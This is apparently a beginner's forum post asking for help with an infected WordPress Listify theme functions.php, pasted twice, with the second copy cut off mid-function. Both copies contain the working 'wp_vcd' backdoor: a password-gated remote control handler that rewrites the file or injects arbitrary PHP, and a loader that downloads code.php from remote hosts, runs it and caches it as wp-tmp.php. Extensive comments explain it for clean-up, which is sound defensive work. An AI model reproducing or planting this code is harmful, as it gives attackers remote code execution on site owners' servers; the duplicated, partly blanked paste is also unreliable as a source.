I have been told that the code below contains malware and this is what the hosting guys sent me. But I do not know where this would be or what it means. I am a beginner so apologies if it sounds dumb.
functions.php /home/sites/3a/e/e806688333/public_html/wp-content/themes/listify/functions.php generic. file.get.contents.0
<?php
// ---------------------------------------------------------------------------
// MALWARE — not part of the Listify child theme. Everything from here to the
// "//$end_wp_theme_tmp" marker comment is an injected implant (the "wp_vcd"
// string below is its family marker). This first part is its remote-control
// interface. It reads $_REQUEST before WordPress has set up any user, so it is
// reachable by anyone who can send a request to the site; the only gate is the
// fixed token on the next line. Indicators for log review: request parameters
// "action" and "password", the token d73f3077ba6aca159219759cddb58d11, and the
// response bodies "true" and "ERROR_WP_ACTION WP_V_CD WP_CD". The "@" operators
// throughout keep warnings out of the error log, which is part of why this goes
// unnoticed.
// ---------------------------------------------------------------------------
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd73f3077ba6aca159219759cddb58d11'))
{
// Family marker; the same string appears again below and in other infected files.
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
// "change_domain": rewrites THIS file in place, swapping the host name found in
// its own file_get_contents("http://<host>/code.php") download line for the one
// supplied in the request. The implant can move its download server without
// having to re-infect the site.
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
// "change_code": replaces whatever sits between the "//$start_wp_theme_tmp" and
// "//$end_wp_theme_tmp" comment markers (at the end of the injected section)
// with request-supplied text and writes this file back. That is arbitrary PHP
// injection into a file WordPress executes on every request.
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
// Unknown action: fixed fingerprint string in the response.
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
// Control requests never fall through to the real site.
die("");
}
// Second part of the implant: the loader. Unlike the control block above, it
// runs on every request that loads this theme (front-end and admin alike),
// except wp-cron.php and xmlrpc.php requests. Both variables here are unused.
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
// Guard against a second definition: the same block is commonly copied into
// more than one theme's functions.php, which would otherwise be a fatal error.
if(!function_exists('theme_temp_setup')) {
// Unused; note the unquoted REQUEST_URI constant (a notice, not an error).
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
// Skips cron and XML-RPC requests (presumably to stay out of non-browser
// traffic). Uses "== false", so a match at offset 0 would be missed — an
// implant bug; do not fix it, remove the block.
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
// Fallback downloader used when file_get_contents() cannot open URLs
// (allow_url_fopen off): fetches $url with cURL, follows redirects, returns
// the body only.
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
// Executes $phpCode: writes it to a temp file (system temp dir, else the
// current directory), include()s it — which runs it — deletes the file, and
// returns every variable it defined to the caller. This is the remote-code-
// execution primitive of the implant. The temp file exists only for the
// duration of the include, so a file scan of the site will not find the
// payload itself; only the cached copies written further down are on disk.
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
// Marker the downloaded payload must contain before it is executed or cached
// (apparently a check that the fetch returned the expected payload — cannot be
// confirmed from here). Also a convenient string to grep for across the site.
$wp_auth_key='0bb00640fa54049fc4c2c5e080f9f51a';
// Primary download attempt. The remote URL was blanked when this page was
// rendered; the pattern the change_domain handler above rewrites is
// http://<host>/code.php. If the payload is fetched and carries the marker, it
// is executed immediately and then cached to disk at up to three locations, in
// order: wp-includes/wp-tmp.php, <parent theme dir>/wp-tmp.php, and
// ./wp-tmp.php relative to the request's working directory. Each is an
// artefact to delete during clean-up.
if (($tmpcontent = @file_get_contents(".php") OR $tmpcontent = @file_get_contents_tcurl(".php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
// Redundant: the same test is already part of the if() condition.
if (stripos($tmpcontent, $wp_auth_key) !== false) {
// extract() imports every variable the payload defined into this file's scope.
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
// Second download host (URL blanked in this rendering); same execute-then-cache logic.
elseif ($tmpcontent = @file_get_contents(".php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
// Third download host (URL blanked in this rendering); same logic again.
elseif ($tmpcontent = @file_get_contents("/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
// Offline fallback: when no download host is reachable, the cached wp-tmp.php
// copies are executed instead, so the infection keeps working until those files
// are deleted as well. Restoring functions.php alone is not a complete clean-up.
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
/**
* Listify child theme.
*/
// Logout: redirect to the homepage
// Run go_home() (defined just below) when a user logs out.
add_action('wp_logout','go_home');
/**
 * Send the user to the site's front page after logging out.
 *
 * The target is always home_url(), never a request value, so there is no
 * open-redirect concern here. Exits so nothing is emitted after the redirect.
 */
function go_home() {
	$target = home_url();
	wp_redirect( $target );
	exit;
}
// Fin
/**
 * Enqueue the child theme's own style.css.
 *
 * Registered on wp_enqueue_scripts with a late priority so it loads after
 * the parent theme's styles.
 */
function listify_child_styles() {
	$stylesheet = get_stylesheet_uri();
	wp_enqueue_style( 'listify-child', $stylesheet );
}
// Priority 999: enqueue after the parent theme so the child stylesheet overrides it.
add_action( 'wp_enqueue_scripts', 'listify_child_styles', 999 );
/** Place any new code below this line */
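/**
 * Use a per-term image (city, category, …) as the cover on that term's page.
 *
 * Hooked to `listify_cover_image`. The file is looked up by the term's slug
 * inside the fixed $url directory, so a term with slug "restaurants" resolves
 * to "/pics/restaurants.jpg". Upload one image per term slug to that directory.
 *
 * Only edit $url below; do not put an image name in it.
 *
 * @param mixed $image Cover image value the theme computed so far.
 * @param array $args  Filter arguments; `$args['term']` is the term object, when set.
 * @return mixed A one-element array holding the image URL, or `$image` unchanged.
 */
function custom_listify_cover_image( $image, $args ) {
	// Nothing to do unless a term with a non-empty slug was supplied. This also
	// covers a non-object or slug-less term, which previously produced "/pics/.jpg".
	if ( ! isset( $args['term']->slug ) || '' === $args['term']->slug ) {
		return $image;
	}
	// The slug is used as-is; it is assumed to be a WordPress term slug, which is
	// already normalised — verify if terms can come from anywhere else.
	$url = '/pics/';
	return array( $url . $args['term']->slug . '.jpg' );
}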
// Default priority, two arguments ($image, $args); the term is read from $args.
add_filter( 'listify_cover_image', 'custom_listify_cover_image', 10, 2 );
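/**
 * Only let the listing's author upload photos to it.
 *
 * Hooked to `listify_can_upload_to_listing`. This is an extra authorization
 * gate on top of the theme's own decision: the owner keeps whatever `$can`
 * was decided upstream, everyone else is denied.
 *
 * @param bool $can Whether the upload has been allowed so far.
 * @return bool `$can` for the listing owner, false for anyone else.
 */
function limit_who_can_upload( $can ) {
	global $post;
	// No listing in context means there is no owner to match against: deny.
	if ( ! isset( $post->post_author ) ) {
		return false;
	}
	// post_author is stored as a numeric string; compare as integers rather than with ==.
	if ( (int) $post->post_author === get_current_user_id() ) {
		return $can;
	}
	return false;
}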
// Authorization gate for listing photo uploads; see limit_who_can_upload().
add_filter( 'listify_can_upload_to_listing','limit_who_can_upload' );
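/**
 * Listify - default cover image for listings.
 *
 * Hooked to `listify_cover_image` at priority 10, registered after
 * custom_listify_cover_image, so it runs second and only fills in a generic
 * cover when neither the theme nor that filter produced one.
 *
 * @param mixed $image Cover image value computed so far (array of URLs, or empty).
 * @param array $args  Filter arguments; unused here.
 * @return mixed `$image` when it is non-empty, otherwise the default cover.
 */
function custom_default_listify_cover_image( $image, $args ) {
	// Any truthy value (a non-empty array or URL) set upstream wins.
	if ( $image ) {
		return $image;
	}
	// The previous version also declared `global $post` here without using it.
	return array( '/pics/cover.jpg' );
}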
// Same priority as custom_listify_cover_image but registered later, so it runs after it.
add_filter( 'listify_cover_image', 'custom_default_listify_cover_image', 10, 2 );
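/**
 * Listify - make addresses work for Spain (Andalusia).
 *
 * Hooked to `job_manager_geolocation_get_location_data`. Copies the province
 * (Google's `administrative_area_level_2`) out of the geocoder response into
 * the stored address so the address formats below can use it.
 *
 * @param array  $address          Address fields collected so far.
 * @param object $geocoded_address Decoded geocoder response (`->results[0]->address_components`).
 * @return array `$address`, with `administrative_area_level_2` added when present.
 */
function custom_address_data( $address, $geocoded_address ) {
	// The geocoder may return no results (nothing found, quota error): leave the
	// address untouched instead of dereferencing a missing result.
	if ( empty( $geocoded_address->results[0]->address_components ) ) {
		return $address;
	}
	foreach ( $geocoded_address->results[0]->address_components as $component ) {
		// Only the component's primary type is inspected, as before.
		if ( isset( $component->types[0] ) && 'administrative_area_level_2' === $component->types[0] ) {
			$address['administrative_area_level_2'] = sanitize_text_field( $component->long_name );
		}
	}
	return $address;
}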
// Capture the province from the geocoder response when a listing is geolocated.
add_filter( 'job_manager_geolocation_get_location_data', 'custom_address_data', 10, 2 );
/**
 * Supply the `{administrative_area_level_2}` placeholder for WooCommerce address formats.
 *
 * @param array $replacements Placeholder => value map built so far.
 * @param array $args         Address fields for the listing being formatted.
 * @return array `$replacements` with the province placeholder added (false when absent or empty).
 */
function custom_address_replacements( $replacements, $args ) {
	$province = isset( $args['administrative_area_level_2'] ) ? $args['administrative_area_level_2'] : '';
	// An absent or empty province maps to false (loose comparison kept on purpose).
	$replacements['{administrative_area_level_2}'] = ( '' != $province ) ? $province : false;
	return $replacements;
}
// Two arguments: the replacement map and the address fields.
add_filter( 'woocommerce_formatted_address_replacements', 'custom_address_replacements', 10, 2 );
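/**
 * Add the province to the address parts Listify formats for the current listing.
 *
 * Hooked to `listify_formatted_address`. Reads the
 * `geolocation_administrative_area_level_2` value from the global $post.
 *
 * @param array $parts Address parts collected so far.
 * @return array `$parts` with `administrative_area_level_2` set (null when the listing has none).
 */
function custom_formatted_address( $parts ) {
	global $post;
	// Listings without geolocation data have no such value; use null instead of
	// raising an undefined-property warning on every address render.
	$parts['administrative_area_level_2'] = isset( $post->geolocation_administrative_area_level_2 )
		? $post->geolocation_administrative_area_level_2
		: null;
	return $parts;
}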
// Inject the province into Listify's formatted address for the current listing.
add_filter( 'listify_formatted_address', 'custom_formatted_address' );
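/**
 * Swap `{state}` for `{administrative_area_level_2}` in WooCommerce's Spanish address format.
 *
 * Runs at priority 90, after custom_address_formats (priority 20) in this file
 * has already replaced the ES format, so in practice this only matters if some
 * other filter re-introduces `{state}` in between.
 *
 * @param array $formats Country code => address format map.
 * @return array `$formats`, with the ES entry rewritten when present.
 */
function custom_address_formats_shim( $formats ) {
	// Nothing to rewrite when no Spanish format was supplied; previously this
	// overwrote 'ES' with an empty string in that case.
	if ( ! isset( $formats['ES'] ) ) {
		return $formats;
	}
	$formats['ES'] = str_replace( '{state}', '{administrative_area_level_2}', $formats['ES'] );
	return $formats;
}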
// Priority 90: runs after custom_address_formats (20) so it sees the final ES format.
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats_shim', 90 );
/**
 * Make addresses work for Spain (Andalusia): replace WooCommerce's ES address
 * format with one that prints the province instead of the state.
 *
 * @param array $formats Country code => address format map.
 * @return array `$formats` with the ES entry replaced.
 */
function custom_address_formats( $formats ) {
	$lines = array(
		'{address_1}',
		'{address_2}',
		'{postcode} - {city}',
		'{administrative_area_level_2} (Spain)',
	);
	$formats['ES'] = implode( "\n", $lines );
	return $formats;
}
// Priority 20: replaces the ES format before custom_address_formats_shim (90) runs.
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats', 20 );
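/**
 * Hide WordPress core/plugin update notifications from users who cannot act on them.
 *
 * Only users lacking the `update_plugins` capability are affected, so
 * administrators still see and can run updates. Note that this condition is
 * also true for anonymous visitors, so the init hook below fires on most
 * requests; removing wp_version_check there may delay core update checks —
 * confirm against the WordPress version in use.
 */
global $user_login;
// wp_get_current_user() replaces the deprecated get_currentuserinfo(); it populates
// the same user globals, which is the only effect the old call had here.
wp_get_current_user();
if ( ! current_user_can( 'update_plugins' ) ) {
	// Closures replace create_function(), which is removed in PHP 8 (and was eval() underneath).
	add_action(
		'init',
		function () {
			remove_action( 'init', 'wp_version_check' );
		},
		2
	);
	add_filter( 'pre_option_update_core', function () {
		return null;
	} );
}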
////////////////////////////////////////////////////////////////////////
// BuddyPress Profile URL Integration //////////////////////////////////
////////////////////////////////////////////////////////////////////////
// Point wpDiscuz commenter links at the BuddyPress profile when BuddyPress is active.
add_filter('wpdiscuz_profile_url', 'wpdiscuz_bp_profile_url', 10, 2);
/**
 * Use the BuddyPress member page as a commenter's profile URL.
 *
 * @param string      $profile_url URL wpDiscuz would use by default.
 * @param object|null $user        Commenting user (needs an `ID`), or null for guests.
 * @return string The BuddyPress member URL, or `$profile_url` when there is no user or no BuddyPress.
 */
function wpdiscuz_bp_profile_url( $profile_url, $user ) {
	if ( ! $user || ! class_exists( 'BuddyPress' ) ) {
		return $profile_url;
	}
	return bp_core_get_user_domain( $user->ID );
}
// Remove WooCommerce's "WooThemes updater" admin notice.
remove_action( 'admin_notices', 'woothemes_updater_notice' );
// Enable shortcodes in job/listing descriptions. Descriptions are submitted by
// listing authors, so every shortcode registered on the site becomes callable
// from that user-supplied text — review which shortcodes front-end submitters
// should be able to reach.
add_filter( 'the_job_description', 'do_shortcode' );
I have been told that the code below contains malware and this is what the hosting guys sent me. But I do not know where this would be or what it means. I am a beginner so apologies if it sounds dumb.
functions.php /home/sites/3a/e/e806688333/public_html/wp-content/themes/listify/functions.php generic. file.get.contents.0
<?php
// ---------------------------------------------------------------------------
// MALWARE — not part of the Listify child theme. Everything from here to the
// "//$end_wp_theme_tmp" marker comment is an injected implant (the "wp_vcd"
// string below is its family marker). This first part is its remote-control
// interface. It reads $_REQUEST before WordPress has set up any user, so it is
// reachable by anyone who can send a request to the site; the only gate is the
// fixed token on the next line. Indicators for log review: request parameters
// "action" and "password", the token d73f3077ba6aca159219759cddb58d11, and the
// response bodies "true" and "ERROR_WP_ACTION WP_V_CD WP_CD". The "@" operators
// throughout keep warnings out of the error log, which is part of why this goes
// unnoticed.
// ---------------------------------------------------------------------------
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd73f3077ba6aca159219759cddb58d11'))
{
// Family marker; the same string appears again below and in other infected files.
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
// "change_domain": rewrites THIS file in place, swapping the host name found in
// its own file_get_contents("http://<host>/code.php") download line for the one
// supplied in the request. The implant can move its download server without
// having to re-infect the site.
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
// "change_code": replaces whatever sits between the "//$start_wp_theme_tmp" and
// "//$end_wp_theme_tmp" comment markers (at the end of the injected section)
// with request-supplied text and writes this file back. That is arbitrary PHP
// injection into a file WordPress executes on every request.
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
// Unknown action: fixed fingerprint string in the response.
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
// Control requests never fall through to the real site.
die("");
}
// Second part of the implant: the loader. Unlike the control block above, it
// runs on every request that loads this theme (front-end and admin alike),
// except wp-cron.php and xmlrpc.php requests. Both variables here are unused.
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
// Guard against a second definition: the same block is commonly copied into
// more than one theme's functions.php, which would otherwise be a fatal error.
if(!function_exists('theme_temp_setup')) {
// Unused; note the unquoted REQUEST_URI constant (a notice, not an error).
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
// Skips cron and XML-RPC requests (presumably to stay out of non-browser
// traffic). Uses "== false", so a match at offset 0 would be missed — an
// implant bug; do not fix it, remove the block.
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
// Fallback downloader used when file_get_contents() cannot open URLs
// (allow_url_fopen off): fetches $url with cURL, follows redirects, returns
// the body only.
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
// Executes $phpCode: writes it to a temp file (system temp dir, else the
// current directory), include()s it — which runs it — deletes the file, and
// returns every variable it defined to the caller. This is the remote-code-
// execution primitive of the implant. The temp file exists only for the
// duration of the include, so a file scan of the site will not find the
// payload itself; only the cached copies written further down are on disk.
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
// Marker the downloaded payload must contain before it is executed or cached
// (apparently a check that the fetch returned the expected payload — cannot be
// confirmed from here). Also a convenient string to grep for across the site.
$wp_auth_key='0bb00640fa54049fc4c2c5e080f9f51a';
// Primary download attempt from the first of three download hosts seen in this
// file: www.facocs (as rendered here, possibly truncated), www.facocs.pw and
// www.facocs.top — block these at the egress firewall / DNS and search access
// and outbound logs for them. If the payload is fetched and carries the marker,
// it is executed immediately and then cached to disk at up to three locations,
// in order: wp-includes/wp-tmp.php, <parent theme dir>/wp-tmp.php, and
// ./wp-tmp.php relative to the request's working directory. Each is an
// artefact to delete during clean-up.
if (($tmpcontent = @file_get_contents("http://www.facocs/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.facocs/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
// Redundant: the same test is already part of the if() condition.
if (stripos($tmpcontent, $wp_auth_key) !== false) {
// extract() imports every variable the payload defined into this file's scope.
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
// Second download host; same execute-then-cache logic.
elseif ($tmpcontent = @file_get_contents("http://www.facocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
// Third download host; same logic again.
elseif ($tmpcontent = @file_get_contents("http://www.facocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
// Offline fallback: when no download host is reachable, the cached wp-tmp.php
// copies are executed instead, so the infection keeps working until those files
// are deleted as well. Restoring functions.php alone is not a complete clean-up.
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
/**
* Listify child theme.
*/
// Logout: redirect to the homepage
// Run go_home() (defined just below) when a user logs out.
add_action('wp_logout','go_home');
/**
 * Send the user to the site's front page after logging out.
 *
 * The target is always home_url(), never a request value, so there is no
 * open-redirect concern here. Exits so nothing is emitted after the redirect.
 */
function go_home() {
	$target = home_url();
	wp_redirect( $target );
	exit;
}
// Fin
/**
 * Enqueue the child theme's own style.css.
 *
 * Registered on wp_enqueue_scripts with a late priority so it loads after
 * the parent theme's styles.
 */
function listify_child_styles() {
	$stylesheet = get_stylesheet_uri();
	wp_enqueue_style( 'listify-child', $stylesheet );
}
// Priority 999: enqueue after the parent theme so the child stylesheet overrides it.
add_action( 'wp_enqueue_scripts', 'listify_child_styles', 999 );
/** Place any new code below this line */
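/**
 * Use a per-term image (city, category, …) as the cover on that term's page.
 *
 * Hooked to `listify_cover_image`. The file is looked up by the term's slug
 * inside the fixed $url directory, so a term with slug "restaurants" resolves
 * to http://yourwebsite/images/directory/restaurants.jpg when $url points at
 * that directory. Upload one image per term slug there.
 *
 * Only edit $url below; do not put an image name in it.
 *
 * @param mixed $image Cover image value the theme computed so far.
 * @param array $args  Filter arguments; `$args['term']` is the term object, when set.
 * @return mixed A one-element array holding the image URL, or `$image` unchanged.
 */
function custom_listify_cover_image( $image, $args ) {
	// Nothing to do unless a term with a non-empty slug was supplied. This also
	// covers a non-object or slug-less term, which previously produced "/pics/.jpg".
	if ( ! isset( $args['term']->slug ) || '' === $args['term']->slug ) {
		return $image;
	}
	// The slug is used as-is; it is assumed to be a WordPress term slug, which is
	// already normalised — verify if terms can come from anywhere else.
	$url = '/pics/';
	return array( $url . $args['term']->slug . '.jpg' );
}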
// Default priority, two arguments ($image, $args); the term is read from $args.
add_filter( 'listify_cover_image', 'custom_listify_cover_image', 10, 2 );
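/**
 * Only let the listing's author upload photos to it.
 *
 * Hooked to `listify_can_upload_to_listing`. This is an extra authorization
 * gate on top of the theme's own decision: the owner keeps whatever `$can`
 * was decided upstream, everyone else is denied.
 *
 * @param bool $can Whether the upload has been allowed so far.
 * @return bool `$can` for the listing owner, false for anyone else.
 */
function limit_who_can_upload( $can ) {
	global $post;
	// No listing in context means there is no owner to match against: deny.
	if ( ! isset( $post->post_author ) ) {
		return false;
	}
	// post_author is stored as a numeric string; compare as integers rather than with ==.
	if ( (int) $post->post_author === get_current_user_id() ) {
		return $can;
	}
	return false;
}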
// Authorization gate for listing photo uploads; see limit_who_can_upload().
add_filter( 'listify_can_upload_to_listing','limit_who_can_upload' );
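/**
 * Listify - default cover image for listings.
 *
 * Hooked to `listify_cover_image` at priority 10, registered after
 * custom_listify_cover_image, so it runs second and only fills in a generic
 * cover when neither the theme nor that filter produced one.
 *
 * @param mixed $image Cover image value computed so far (array of URLs, or empty).
 * @param array $args  Filter arguments; unused here.
 * @return mixed `$image` when it is non-empty, otherwise the default cover.
 */
function custom_default_listify_cover_image( $image, $args ) {
	// Any truthy value (a non-empty array or URL) set upstream wins.
	if ( $image ) {
		return $image;
	}
	// The previous version also declared `global $post` here without using it.
	return array( '/pics/cover.jpg' );
}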
// Same priority as custom_listify_cover_image but registered later, so it runs after it.
add_filter( 'listify_cover_image', 'custom_default_listify_cover_image', 10, 2 );
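/**
 * Listify - make addresses work for Spain (Andalusia).
 *
 * Hooked to `job_manager_geolocation_get_location_data`. Copies the province
 * (Google's `administrative_area_level_2`) out of the geocoder response into
 * the stored address so the address formats below can use it.
 *
 * @param array  $address          Address fields collected so far.
 * @param object $geocoded_address Decoded geocoder response (`->results[0]->address_components`).
 * @return array `$address`, with `administrative_area_level_2` added when present.
 */
function custom_address_data( $address, $geocoded_address ) {
	// The geocoder may return no results (nothing found, quota error): leave the
	// address untouched instead of dereferencing a missing result.
	if ( empty( $geocoded_address->results[0]->address_components ) ) {
		return $address;
	}
	foreach ( $geocoded_address->results[0]->address_components as $component ) {
		// Only the component's primary type is inspected, as before.
		if ( isset( $component->types[0] ) && 'administrative_area_level_2' === $component->types[0] ) {
			$address['administrative_area_level_2'] = sanitize_text_field( $component->long_name );
		}
	}
	return $address;
}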
// Capture the province from the geocoder response when a listing is geolocated.
add_filter( 'job_manager_geolocation_get_location_data', 'custom_address_data', 10, 2 );
/**
 * Supply the `{administrative_area_level_2}` placeholder for WooCommerce address formats.
 *
 * @param array $replacements Placeholder => value map built so far.
 * @param array $args         Address fields for the listing being formatted.
 * @return array `$replacements` with the province placeholder added (false when absent or empty).
 */
function custom_address_replacements( $replacements, $args ) {
	$province = isset( $args['administrative_area_level_2'] ) ? $args['administrative_area_level_2'] : '';
	// An absent or empty province maps to false (loose comparison kept on purpose).
	$replacements['{administrative_area_level_2}'] = ( '' != $province ) ? $province : false;
	return $replacements;
}
// Two arguments: the replacement map and the address fields.
add_filter( 'woocommerce_formatted_address_replacements', 'custom_address_replacements', 10, 2 );
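/**
 * Add the province to the address parts Listify formats for the current listing.
 *
 * Hooked to `listify_formatted_address`. Reads the
 * `geolocation_administrative_area_level_2` value from the global $post.
 *
 * @param array $parts Address parts collected so far.
 * @return array `$parts` with `administrative_area_level_2` set (null when the listing has none).
 */
function custom_formatted_address( $parts ) {
	global $post;
	// Listings without geolocation data have no such value; use null instead of
	// raising an undefined-property warning on every address render.
	$parts['administrative_area_level_2'] = isset( $post->geolocation_administrative_area_level_2 )
		? $post->geolocation_administrative_area_level_2
		: null;
	return $parts;
}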
// Inject the province into Listify's formatted address for the current listing.
add_filter( 'listify_formatted_address', 'custom_formatted_address' );
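/**
 * Swap `{state}` for `{administrative_area_level_2}` in WooCommerce's Spanish address format.
 *
 * Runs at priority 90, after custom_address_formats (priority 20) in this file
 * has already replaced the ES format, so in practice this only matters if some
 * other filter re-introduces `{state}` in between.
 *
 * @param array $formats Country code => address format map.
 * @return array `$formats`, with the ES entry rewritten when present.
 */
function custom_address_formats_shim( $formats ) {
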